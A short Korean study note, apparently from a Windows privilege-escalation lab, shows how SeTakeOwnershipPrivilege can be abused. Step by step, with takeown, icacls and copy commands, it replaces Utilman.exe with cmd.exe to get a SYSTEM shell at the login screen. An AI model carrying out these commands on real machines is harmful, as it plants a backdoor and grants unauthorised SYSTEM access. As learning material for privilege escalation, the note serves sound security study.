# SeTakeOwnershipPrivilege - 이 권한은 사용자가 시스템의 어떤 파일이든 소유권을 탈취할 수 있게 해줌. # 1. 관리자 권한으로 CMD 실행 # 2. 현재 권한 확인 ```powershell whoami /priv # 예시 출력 SeTakeOwnershipPrivilege Disabled ``` # 3. 목표 파일 선정 - `Utilman.exe` - `Utilman.exe`는 윈도우 로그인 화면의 **Ease of Access** 버튼이 실행하는 시스템 프로그램. - SYSTEM 권한으로 실행되므로, 우리가 여기에 `cmd.exe`를 덮어씌우면, 로그인 화면에서 SYSTEM 권한을 획득할 수 있다. ![[Pasted image 20250621183857.png]] # 4. `Utilman.exe`의 소유권 탈취 ```powershell takeown /f C:\Windows\System32\Utilman.exe ``` - 파일의 소유권을 현재 사용자로 변경함. ```powershell # 예시 출력 SUCCESS: The file ... now owned by user "WINPRIVESC2\wooktakseownership". ``` # 5. 파일 권한 부여 소유자가 되었다고 해서 바로 수정 가능하지는 않음. 권한을 명시적으로 부여해야 함. ```powershell icacls C:\Windows\System32\Utilman.exe /grant wooktakesownership:F ``` `wooktakesownership` 유저에게 Full Control (F) 권한 부여 # 6. `Utilman.exe`를 `cmd.exe`로 교체 ```powershell C:\Windows\system32>copy cmd.exe Utilman.exe Overwrite Utilman.exe? (Yes/No/All): Yes 1 file(s) copied. ``` - 기존 `utilman.exe`를 덮어씀 - 이제 `Ease of Access` 버튼은 곧 SYSTEM 권한 cmd. # 7. 로그인 화면에서 SYSTEM CMD 실행 1. 윈도우 시작 메뉴 -> 사용자 아이콘 -> 화면 잠금 (Lock) 2. 로그인 화면에서 우측 하단에 Ease of Access 버튼 클릭 3. 원래는 접근성 도구가 실행되지만, 이제는 `cmd.exe`가 실행됨. ![[Pasted image 20250621184621.png]]\